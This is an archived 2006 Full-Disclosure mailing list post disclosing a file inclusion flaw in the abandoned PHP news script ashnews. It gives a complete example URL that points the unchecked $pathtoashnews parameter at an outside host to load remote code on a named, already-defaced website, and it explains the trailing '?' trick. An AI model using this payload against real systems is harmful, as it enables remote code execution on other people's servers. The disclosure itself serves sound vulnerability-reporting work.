| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <43DF3F47.8010700@f-box.org> Date: Tue Jan 31 10:43:31 2006 From: dan-fd at f-box.org (DanB-FD) Subject: ashnews Cross-Site Scripting Vulnerability Hi, Dan B UK wrote: > Due to the nature of the issue I am not disclosing the detail of it > until the writer of the software has updated it; maybe you could have > waited?? > > A vulnerability that allows privileges of the apache user within the > limitations of how much PHP has been locked down. Since the author of the product has got back to me with the following I think it is ok to disclose the issue now. "That is a known error. Unfortunately I have completely abondoned ashnews. In fact, I have been neglecting taking it down completely which I am going to do right now. - Derek" The issue is in the handling of the $pathtoashnews, it is not validated before being used by the script. Allowing remote or local file inclusion. eg: http://dosko.nl/news/ashnews.php?pathtoashnews=http://f-box.org/~dan/inc.inc? ( The ? is required to make the remote server (f-box.org) ignore the string that is appended to the variable $pathtoashnews ) ( The website that is in the example above has already been defaced! ) Cheers, DanB UK.
Powered by blists - more mailing lists